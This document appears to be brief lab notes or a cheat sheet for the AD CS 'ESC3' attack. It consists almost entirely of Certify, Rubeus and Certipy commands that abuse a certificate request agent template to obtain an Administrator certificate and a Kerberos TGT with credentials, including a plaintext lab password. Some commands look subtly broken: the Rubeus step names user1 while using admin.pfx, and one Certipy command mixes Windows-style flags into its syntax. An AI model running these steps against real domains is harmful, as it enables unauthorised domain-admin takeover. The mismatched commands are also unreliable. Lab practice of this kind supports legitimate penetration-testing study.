ESC3
Enumerate ESC3 vulnerability
Find a template whose EKU permits using the issued certificate as a Certificate Request Agent.
Windows
Requesting a certificate
PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:Template3
Convert Certificate
Request a Certificate on behalf of the Administrator
PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:Template3 /onbehalfof:lab\Administrator /enrollcert:cert.pfx
Convert Certificate
admin.pfx
Request a TGT as the Administrator
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1@local.lab /certificate:admin.pfx /getcredentials
Linux
Requesting a certificate
bobbuilder[/home]$ certipy req -ca lab-LAB-DC-CA -template 'Template3' /altname:administrator@local.lab
Requesting a certificate on behalf of the Administrator account
bobbuilder[/home]$ certipy req -u 'user1@local.lab' -p 'password1' -ca CA-Server.local.lab -template 'Template3' -on-behalf-of 'lab\administrator' -pfx user1.pfx